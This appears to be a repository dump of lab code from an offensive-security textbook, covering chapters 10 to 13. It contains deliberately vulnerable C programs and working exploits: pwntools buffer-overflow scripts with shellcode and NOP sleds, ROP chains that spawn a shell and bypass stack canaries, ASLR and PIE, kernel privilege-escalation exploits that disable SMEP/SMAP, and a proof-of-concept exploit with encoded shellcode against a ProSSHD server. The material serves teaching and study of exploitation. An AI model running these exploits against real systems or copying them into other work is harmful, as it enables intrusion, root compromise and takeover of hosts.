# If you only have one Kafka instance (default for HELK) then remove the 2nd IP that has port 9093
hosts: ["192.168.38.105:9092",]
topic: "winlogbeat"
############################# HELK Optimizing Latency ######################
max_retries: 2
max_message_bytes: 1000000
================================================
FILE: ch10/ch10_6_exploit.py
================================================
#!/usr/bin/env python3
#ch10_6_exploit.py
from pwn import *
context(bits=32, arch='i386')
# Connect to vulnerable ch10_6 server
p = remote('localhost', 5555)
# findpeersh ( dup2(socket) + execve(/bin/sh) ) shellcode
shellcode = asm(shellcraft.findpeersh())
nopsled_address = p32(0xffffd418)
# Craft our payload
payload = b"A"*264
payload += nopsled_address
payload += b"\x90"*32
payload += shellcode
p.sendlineafter(b"Username: ", payload) # Send payload
p.interactive()
================================================
FILE: ch10/getenv.c
================================================
//getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
printf("0x%08x\n", (getenv("SHELLCODE") + strlen("SHELLCODE=")));
return 0;
}
================================================
FILE: ch10/meet.c
================================================
// meet.c
#include <stdio.h> // needed for screen printing
#include <string.h> // needed for strcpy
void greeting(char *temp1,char *temp2){ // greeting function to say hello
char name[400]; // string variable to hold the name
strcpy(name, temp2); // copy argument to name with the infamous strcpy
printf("Hello %s %s\n", temp1, name); // print out the greeting
}
int main(int argc, char * argv[]){ // note the format for arguments
greeting(argv[1], argv[2]); // call function, pass title & name
printf("Bye %s %s\n", argv[1], argv[2]); // say "bye"
} // exit program
================================================
FILE: ch10/meet_exploit.py
================================================
#!/usr/bin/env python3
#meet_exploit.py
from pwn import *
context.update(arch='i386', os='linux')
shellcode = b"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
sc_offset = p32(0xffffd224)
nops = b"\x90"*(412 - len(shellcode) - len(sc_offset))
payload = nops + shellcode + sc_offset
p = process(["./meet", "Mr", payload])
p.interactive()
================================================
FILE: ch10/overflow.c
================================================
//overflow.c
#include <string.h>
int main(){
char str1[10]; //declare a 10 byte string
//next, copy 35 bytes of "A" to str1
strcpy (str1, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
return 0;
}
================================================
FILE: ch10/shellcode.c
================================================
#include <stdio.h>
#include <sys/mman.h>
const char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() { //main function
//The shellcode is on the .data segment,
//we will use mprotect to make the page executable.
mprotect(
(void *)((int)shellcode & ~4095),
4096,
PROT_READ | PROT_WRITE | PROT_EXEC
);
//Convert the address of the shellcode variable to a function pointer,
//allowing us to call it and execute the code.
int (*ret)() = (int(*)())shellcode;
return ret();
}
================================================
FILE: ch10/smallbuff.c
================================================
//smallbuff.c
#include <string.h>
int main(int argc, char * argv[]){
char buff[10]; //small buffer
strcpy(buff, argv[1]); //vulnerable function call
return 0;
}
================================================
FILE: ch10/smallbuff_exploit.py
================================================
#!/usr/bin/env python3
#smallbuf_exploit.py
from pwn import *
#Get SHELLCODE env
envp = process("./getenv")
shellcode_env = p32(int(envp.readline().strip(), 16))
envp.close()
payload = b"A"*18 + shellcode_env
p = process(["./smallbuff", payload])
p.interactive()
================================================
FILE: ch11/README.md
================================================
The Kali version used at the time of writing was 2020.4 (GCC 10.2.0). Newer Kali/GCC versions breaks the `exploit3.py` and `exploit4.py` because the stack canary validation now affects the rdx register.
Here we've provided:
* A compiled `vuln` binary compiled on Kali 2020.4, to allow you to follow the same steps from the book in your own Kali version.
* A new working exploit (`exploit3-v2.py`) with a workaround to this problem. It should work on newer Kali versions (tested on Kali 2022.1 and Kali 2022.2).
================================================
FILE: ch11/exploit1.py
================================================
from pwn import *
# Lab 11-2: Bypassing Non-executable stack (NX) with Return Oriented Programming (ROP)
# gcc -no-pie vuln.c -o vuln
# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc.address = 0x00007ffff7def000
rop = ROP(libc)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(next(libc.search(b"/bin/sh")))
log.info(f"ROP Chain:\n{rop.dump()}")
r = remote("127.0.0.1", 4446, level='error')
payload = b"A"*120
payload += bytes(rop)
r.sendafter("Password: ", payload)
r.interactive()
================================================
FILE: ch11/exploit2.py
================================================
from pwn import *
# Lab 11-3: Defeating Stack Canaries
# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')
def exploit(payload, interactive=False):
r = remote("127.0.0.1", 4446, level='error')
r.sendafter(b"Password: ", payload)
try:
if r.recvrepeat(0.1)[:7] == b"Invalid":
return True
except EOFError:
return False
finally:
if interactive:
r.interactive()
else:
r.close()
def leak_bytes(payload, name):
leaked_bytes = []
progress = log.progress(name, level=logging.WARN)
for _ in range(8):
for i in range(256):
if exploit(payload + p8(i)):
payload += p8(i)
leaked_bytes.insert(0, hex(i))
progress.status(repr(leaked_bytes))
break
progress.success(repr(leaked_bytes))
log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
return payload[-8:]
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc.address = 0x00007ffff7def000
rop = ROP(libc)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(next(libc.search(b"/bin/sh")))
log.info(f"ROP Chain:\n{rop.dump()}")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += p64(0xBADC0FFEE0DDF00D) #SFP
payload += bytes(rop)
exploit(payload, True)
================================================
FILE: ch11/exploit3-v2.py
================================================
from pwn import *
# Lab 11-4: ASLR bypass with an Information Leak
# gcc -no-pie -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')
def exploit(payload, interactive=False, leak=False):
r = remote("127.0.0.1", 4446, level='error')
r.sendafter(b"Password: ", payload)
try:
if leak:
return u64(r.recv(8))
if r.recvrepeat(0.1)[:7] == b"Invalid":
return True
except EOFError:
return False
finally:
if interactive:
r.interactive()
else:
r.close()
def leak_bytes(payload, name):
leaked_bytes = []
progress = log.progress(name, level=logging.WARN)
for _ in range(8):
for i in range(256):
if exploit(payload + p8(i)):
payload += p8(i)
leaked_bytes.insert(0, hex(i))
progress.status(repr(leaked_bytes))
break
progress.success(repr(leaked_bytes))
log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
return payload[-8:]
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += p64(elf.plt.printf + 8) # 0x4010a8 <printf@plt+8>: 0xffffff70e9000000 <- [rbp + 0x48]
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
s1_payload = payload
s1_payload += p64(0x40123c) # adc edx, dword ptr [rbp + 0x48]; mov ebp, esp; call 0x11c0;
# mov byte ptr [rip + 0x2e83], 1; pop rbp; ret
s1_payload += p64(0xBADC0FEE0DDF00D)
s1_payload += bytes(s1_rop)
leaked_write = exploit(s1_payload, leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/exploit3.py
================================================
from pwn import *
# Lab 11-4: ASLR bypass with an Information Leak
# gcc -no-pie -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')
def exploit(payload, interactive=False, leak=False):
r = remote("127.0.0.1", 4446, level='error')
r.sendafter("Password: ", payload)
try:
if leak:
return u64(r.recv(8))
if r.recvrepeat(0.1)[:7] == b"Invalid":
return True
except EOFError:
return False
finally:
if interactive:
r.interactive()
else:
r.close()
def leak_bytes(payload, name):
leaked_bytes = []
progress = log.progress(name, level=logging.WARN)
for _ in range(8):
for i in range(256):
if exploit(payload + p8(i)):
payload += p8(i)
leaked_bytes.insert(0, hex(i))
progress.status(repr(leaked_bytes))
break
progress.success(repr(leaked_bytes))
log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
return payload[-8:]
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += p64(0xBADC0FEE0DDF00D) #SFP
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
leaked_write = exploit(payload + bytes(s1_rop), leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/exploit4.py
================================================
from pwn import *
# Lab 11-5: PIE bypass with an Information Leak
# gcc -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')
def exploit(payload, interactive=False, leak=False):
r = remote("127.0.0.1", 4446, level='error')
r.sendafter("Password: ", payload)
try:
if leak:
return u64(r.recv(8))
if r.recvrepeat(0.1)[:7] == b"Invalid":
return True
except EOFError:
return False
finally:
if interactive:
r.interactive()
else:
r.close()
def leak_bytes(payload, name):
leaked_bytes = []
progress = log.progress(name, level=logging.WARN)
for _ in range(8):
for i in range(256):
if exploit(payload + p8(i)):
payload += p8(i)
leaked_bytes.insert(0, hex(i))
progress.status(repr(leaked_bytes))
break
progress.success(repr(leaked_bytes))
log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
return payload[-8:]
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += leak_bytes(payload, "SFP")
leaked_rip = u64(p8(0x6d) + leak_bytes(payload, "RIP")[1:])
log.info(f"Fixed leaked_rip = {hex(leaked_rip)}")
elf.address = leaked_rip - 0x156d
log.info(f"elf.address = {hex(elf.address)}")
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
leaked_write = exploit(payload + bytes(s1_rop), leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <errno.h>
#include <sys/wait.h>
#define BUFLEN 64
#define BIND_ADDRESS "127.0.0.1"
#define PORT 4446
const char secret_pass[] = "Ultr4S3cr3tP4ssw0rd!";
int auth(int connfd) {
char msg[] = "User Access Verification\n\nPassword: ";
write(connfd, msg, strlen(msg));
char buf[BUFLEN];
read(connfd, buf, 512);
return (strncmp(buf, secret_pass, strlen(secret_pass)) == 0);
}
int main(void) {
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("socket() error...\n");
return -1;
}
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){1}, sizeof(int)) == -1) {
perror("setsockopt() error...\n");
return -1;
}
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(PORT);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
if (inet_aton(BIND_ADDRESS, &sa.sin_addr) == 0) {
perror("Invalid address\n");
close(sockfd);
return -1;
}
if (bind(sockfd, (struct sockaddr*) &sa, sizeof(sa)) == -1) {
printf("Can't bind on %s:%d.\n", BIND_ADDRESS, PORT);
close(sockfd);
return -1;
}
if (listen(sockfd, 1) == -1) {
printf("error: %s\n", strerror(errno));
close(sockfd);
return -1;
}
printf("Listening on %s:%d\n", BIND_ADDRESS, PORT);
struct sockaddr_in peer_addr;
socklen_t addr_len = sizeof(peer_addr);
int connfd;
while(1) {
if ((connfd = accept(sockfd, (struct sockaddr*) &peer_addr, &addr_len)) < 0)
exit(-1);
pid_t pid = fork();
if (pid == -1) {
perror("fork");
exit(0);
}
if (pid == 0) { //Child
close(sockfd);
if (auth(connfd) == 1) {
char success[] = "Login Successful!";
write(connfd, success, strlen(success));
} else {
char invalid[] = "Invalid Pasword!";
write(connfd, invalid, strlen(invalid));
}
} else if (pid > 0) { //parent
close(connfd);
}
}
return 0;
}
================================================
FILE: ch12/run1.sh
================================================
#!/bin/sh
/usr/bin/qemu-system-x86_64 \
-m 64 \
-kernel ./stackprotector-disabled/bzImage \
-nographic \
-append "rw console=ttyS0 nokaslr quiet" \
-initrd initramfs.cpio \
-fsdev local,id=fs1,path=/home/kali/GHHv6/ch12/shared,security_model=none \
-device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
-monitor /dev/null \
-s
================================================
FILE: ch12/run2.sh
================================================
#!/bin/sh
/usr/bin/qemu-system-x86_64 \
-m 64 \
-kernel bzImage \
-nographic \
-append "rw console=ttyS0 nokaslr quiet" \
-initrd initramfs.cpio \
-fsdev local,id=fs1,path=/home/kali/GHHv6/ch12/shared,security_model=none \
-device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
-monitor /dev/null \
-s
================================================
FILE: ch12/run3.sh
================================================
#!/bin/sh
/usr/bin/qemu-system-x86_64 \
-m 64 \
-kernel bzImage \
-nographic \
-append "rw console=ttyS0 nokaslr quiet" \
-initrd initramfs.cpio \
-fsdev local,id=fs1,path=/home/kali/GHHv6/ch12/shared,security_model=none \
-device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
-monitor /dev/null \
-cpu kvm64,smep \
-s
================================================
FILE: ch12/run4.sh
================================================
#!/bin/sh
/usr/bin/qemu-system-x86_64 \
-m 64 \
-kernel bzImage \
-nographic \
-append "rw console=ttyS0 nokaslr quiet" \
-initrd initramfs.cpio \
-fsdev local,id=fs1,path=/home/kali/GHHv6/ch12/shared,security_model=none \
-device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
-monitor /dev/null \
-cpu kvm64,smep,smap \
-s
================================================
FILE: ch12/run5.sh
================================================
#!/bin/sh
/usr/bin/qemu-system-x86_64 \
-m 64 \
-kernel bzImage \
-nographic \
-append "rw console=ttyS0 quiet" \
-initrd initramfs.cpio \
-fsdev local,id=fs1,path=/home/kali/GHHv6/ch12/shared,security_model=none \
-device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
-monitor /dev/null \
-cpu kvm64,smep,smap \
-s
================================================
FILE: ch12/shared/.ash_history
================================================
================================================
FILE: ch12/shared/exploit1/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
void shell(void){
if (getuid() != 0) {
printf("UID = %d :-(\n", getuid());
exit(-1);
}
system("/bin/sh");
}
unsigned long user_rip = (unsigned long) shell;
void escalate_privileges(void){
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"call 0xffffffff81067d80;" // prepare_kernel_cred
"mov rdi, rax;"
"call 0xffffffff81067be0;" // commit_creds
"swapgs;"
"push user_ss;"
"push user_sp;"
"push user_rflags;"
"push user_cs;"
"push user_rip;"
"iretq;"
".att_syntax;"
);
}
int main() {
save_state();
unsigned long payload[40] = { 0 };
payload[3] = (unsigned long) escalate_privileges;
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/shared/exploit2/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
void shell(void){
if (getuid() != 0) {
printf("UID = %d :-(\n", getuid());
exit(-1);
}
system("/bin/sh");
}
unsigned long user_rip = (unsigned long) shell;
void escalate_privileges(void){
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"call 0xffffffff8106b6a0;" // prepare_kernel_cred
"mov rdi, rax;"
"call 0xffffffff8106b500;" // commit_creds
"swapgs;"
"push user_ss;"
"push user_sp;"
"push user_rflags;"
"push user_cs;"
"push user_rip;"
"iretq;"
".att_syntax;"
);
}
int main() {
save_state();
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
unsigned long leak[5];;
read(fd, leak, sizeof(leak));
unsigned long canary = leak[1];
printf("Canary = 0x%016lx\n", canary);
unsigned long payload[40] = { 0 };
payload[1] = canary;
payload[4] = (unsigned long) escalate_privileges;
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/shared/exploit3/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
void shell(void){
if (getuid() != 0) {
printf("UID = %d :-(\n", getuid());
exit(-1);
}
system("/bin/sh");
}
unsigned long user_rip = (unsigned long) shell;
int main() {
save_state();
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
unsigned long leak[5];;
read(fd, leak, sizeof(leak));
unsigned long canary = leak[1];
printf("Canary = 0x%016lx\n", canary);
unsigned long payload[40] = { 0 };
payload[1] = canary;
int i = 4;
payload[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
payload[i++] = 0;
payload[i++] = 0xffffffff8106b6a0; // prepare_kernel_cred
payload[i++] = 0xffffffff8100534f; // mov r8, rax; mov rax, r8; ret;
payload[i++] = 0xffffffff81113e1b; // mov rdx, r8; ret;
payload[i++] = 0xffffffff811b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
payload[i++] = 0xffffffff8106b500; // commit_creds
payload[i++] = 0xffffffff81400cc6; // common_interrupt_return+22: mov rdi,rsp
payload[i++] = 0;
payload[i++] = 0;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_sp;
payload[i++] = user_ss;
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/shared/exploit4/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
void shell(void){
if (getuid() != 0) {
printf("UID = %d :-(\n", getuid());
exit(-1);
}
system("/bin/sh");
}
unsigned long user_rip = (unsigned long) shell;
int main() {
save_state();
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
unsigned long leak[5];;
read(fd, leak, sizeof(leak));
unsigned long canary = leak[1];
printf("Canary = 0x%016lx\n", canary);
unsigned long payload[40] = { 0 };
payload[1] = canary;
int i = 4;
payload[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
payload[i++] = 0x6B0;
payload[i++] = 0xffffffff811c3843; // mov cr4, rdi; mov r12, r15; ret 8;
payload[i++] = 0xffffffff81022d82; // ret
payload[i++] = 0xffffffff81022d82; // ret
payload[i++] = 0xffffffff81022d81; // pop rax; ret;
payload[i++] = 0xc0d30000; // fake_stack
payload[i++] = 0xffffffff81265330; // mov esp, eax; mov rax, r12; pop r12; pop rbp; ret;
// Fake Stack
unsigned long *fake_stack = mmap((void *) (0xc0d30000 - 0x1000), 0x2000,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
if (fake_stack == MAP_FAILED) {
perror("mmap");
exit(-1);
}
fake_stack[0] = 0xdeadbeefdeadbeef;
i = 512;
fake_stack[i++] = 0xdeadbeefdeadbeef;
fake_stack[i++] = 0xdeadbeefdeadbeef;
fake_stack[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
fake_stack[i++] = 0;
fake_stack[i++] = 0xffffffff8106b6a0; // prepare_kernel_cred
fake_stack[i++] = 0xffffffff8100534f; // mov r8, rax; mov rax, r8; ret;
fake_stack[i++] = 0xffffffff81113e1b; // mov rdx, r8; ret;
fake_stack[i++] = 0xffffffff811b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
fake_stack[i++] = 0xffffffff8106b500; // commit_creds
fake_stack[i++] = 0xffffffff81400cc6; // common_interrupt_return+22: mov rdi,rsp
fake_stack[i++] = 0;
fake_stack[i++] = 0;
fake_stack[i++] = user_rip;
fake_stack[i++] = user_cs;
fake_stack[i++] = user_rflags;
fake_stack[i++] = user_sp;
fake_stack[i++] = user_ss;
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/shared/exploit5/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
void shell(void){
if (getuid() != 0) {
printf("UID = %d :-(\n", getuid());
exit(-1);
}
system("/bin/sh");
}
unsigned long user_rip = (unsigned long) shell;
int main() {
save_state();
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
unsigned long leak[5];;
read(fd, leak, sizeof(leak));
unsigned long canary = leak[1];
unsigned long kernel_base = leak[4] - 0x14c174;
printf("Kernel Base = 0x%016lx\n", kernel_base);
printf("Canary = 0x%016lx\n", canary);
unsigned long payload[40] = { 0 };
payload[1] = canary;
int i = 4;
payload[i++] = kernel_base + 0x1ad2ec; // pop rdi; ret;
payload[i++] = 0x6B0;
payload[i++] = kernel_base + 0x1c3843; // mov cr4, rdi; mov r12, r15; ret 8;
payload[i++] = kernel_base + 0x22d82; // ret
payload[i++] = kernel_base + 0x22d82; // ret
payload[i++] = kernel_base + 0x22d81; // pop rax; ret;
payload[i++] = 0xc0d30000;
payload[i++] = kernel_base + 0x265330; // mov esp, eax; mov rax, r12; pop r12; pop rbp; ret;
// Fake Stack
unsigned long *fake_stack = mmap((void *) (0xc0d30000 - 0x1000), 0x2000,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
if (fake_stack == MAP_FAILED) {
perror("mmap");
exit(-1);
}
fake_stack[0] = 0xdeadbeefdeadbeef;
i = 512;
fake_stack[i++] = 0xdeadbeefdeadbeef;
fake_stack[i++] = 0xdeadbeefdeadbeef;
fake_stack[i++] = kernel_base + 0x1ad2ec; // pop rdi; ret;
fake_stack[i++] = 0;
fake_stack[i++] = kernel_base + 0x6b6a0; // prepare_kernel_cred
fake_stack[i++] = kernel_base + 0x534f; // mov r8, rax; mov rax, r8; ret;
fake_stack[i++] = kernel_base + 0x113e1b; // mov rdx, r8; ret;
fake_stack[i++] = kernel_base + 0x1b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
fake_stack[i++] = kernel_base + 0x6b500; // commit_creds
fake_stack[i++] = kernel_base + 0x400cc6; // common_interrupt_return+22: mov rdi,rsp
fake_stack[i++] = 0;
fake_stack[i++] = 0;
fake_stack[i++] = user_rip;
fake_stack[i++] = user_cs;
fake_stack[i++] = user_rflags;
fake_stack[i++] = user_sp;
fake_stack[i++] = user_ss;
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/shared/leak.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
int main() {
int fd = open("/proc/ghh", O_RDWR);
if (fd < 0) {
puts("Failed to open /proc/ghh");
exit(-1);
}
unsigned long leak[5];;
read(fd, leak, sizeof(leak));
for (int i=0; i < 5; i++)
printf("0x%016lx\n", leak[i]);
unsigned long payload[40] = { 0 };
payload[4] = 0xdeadbeefdeadbeef;
write(fd, payload, sizeof(payload));
return 0;
}
================================================
FILE: ch12/stackprotector-disabled/vmlinux
================================================
[File too large to display: 18.7 MB]
================================================
FILE: ch12/vmlinux
================================================
[File too large to display: 18.8 MB]
================================================
FILE: ch13/hello.c
================================================
#include <stdio.h>
main() {
printf("Hello Haxor");
}
================================================
FILE: ch13/meet.c
================================================
#include <stdio.h>
greeting(char *temp1, char *temp2) {
char name[400];
strcpy(name, temp2);
printf("Hello %s %s\n", temp1, name);
}
main(int argc, char *argv[]) {
greeting(argv[1], argv[2]);
printf("Bye %s %s\n", argv[1], argv[2]);
}
================================================
FILE: ch13/prosshd1.py
================================================
#prosshd3.py POC Exploit
import paramiko
from scp import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
req = "A" * 500
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(15)
with SCPClient(ssh_client.get_transport()) as scp:
scp.put(scp, req)
================================================
FILE: ch13/prosshd2.py
================================================
#prosshd3.py POC Exploit
import paramiko
from scp import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
req = "A" * 492 + "BBBB"
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(15)
with SCPClient(ssh_client.get_transport()) as scp:
scp.put(scp, req)
================================================
FILE: ch13/prosshd3.py
================================================
#prosshd3.py POC Exploit
import paramiko
from scp import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
jmp = struct.pack('<L', 0x7c345c30)
pad = b"\x90" * 12
sc = b""
sc += b"\xb8\x7f\x28\xcf\xda\xdb\xda\xd9\x74\x24\xf4\x5d\x33"
sc += b"\xc9\xb1\x31\x83\xc5\x04\x31\x45\x0f\x03\x45\x70\xca"
sc += b"\x3a\x26\x66\x88\xc5\xd7\x76\xed\x4c\x32\x47\x2d\x2a"
sc += b"\x36\xf7\x9d\x38\x1a\xfb\x56\x6c\x8f\x88\x1b\xb9\xa0"
sc += b"\x39\x91\x9f\x8f\xba\x8a\xdc\x8e\x38\xd1\x30\x71\x01"
sc += b"\x1a\x45\x70\x46\x47\xa4\x20\x1f\x03\x1b\xd5\x14\x59"
sc += b"\xa0\x5e\x66\x4f\xa0\x83\x3e\x6e\x81\x15\x35\x29\x01"
sc += b"\x97\x9a\x41\x08\x8f\xff\x6c\xc2\x24\xcb\x1b\xd5\xec"
sc += b"\x02\xe3\x7a\xd1\xab\x16\x82\x15\x0b\xc9\xf1\x6f\x68"
sc += b"\x74\x02\xb4\x13\xa2\x87\x2f\xb3\x21\x3f\x94\x42\xe5"
sc += b"\xa6\x5f\x48\x42\xac\x38\x4c\x55\x61\x33\x68\xde\x84"
sc += b"\x94\xf9\xa4\xa2\x30\xa2\x7f\xca\x61\x0e\xd1\xf3\x72"
sc += b"\xf1\x8e\x51\xf8\x1f\xda\xeb\xa3\x75\x1d\x79\xde\x3b"
sc += b"\x1d\x81\xe1\x6b\x76\xb0\x6a\xe4\x01\x4d\xb9\x41\xfd"
sc += b"\x07\xe0\xe3\x96\xc1\x70\xb6\xfa\xf1\xae\xf4\x02\x72"
sc += b"\x5b\x84\xf0\x6a\x2e\x81\xbd\x2c\xc2\xfb\xae\xd8\xe4"
sc += b"\xa8\xcf\xc8\x86\x2f\x5c\x90\x66\xca\xe4\x33\x77"
req = b"A" * 492 + jmp + pad + sc
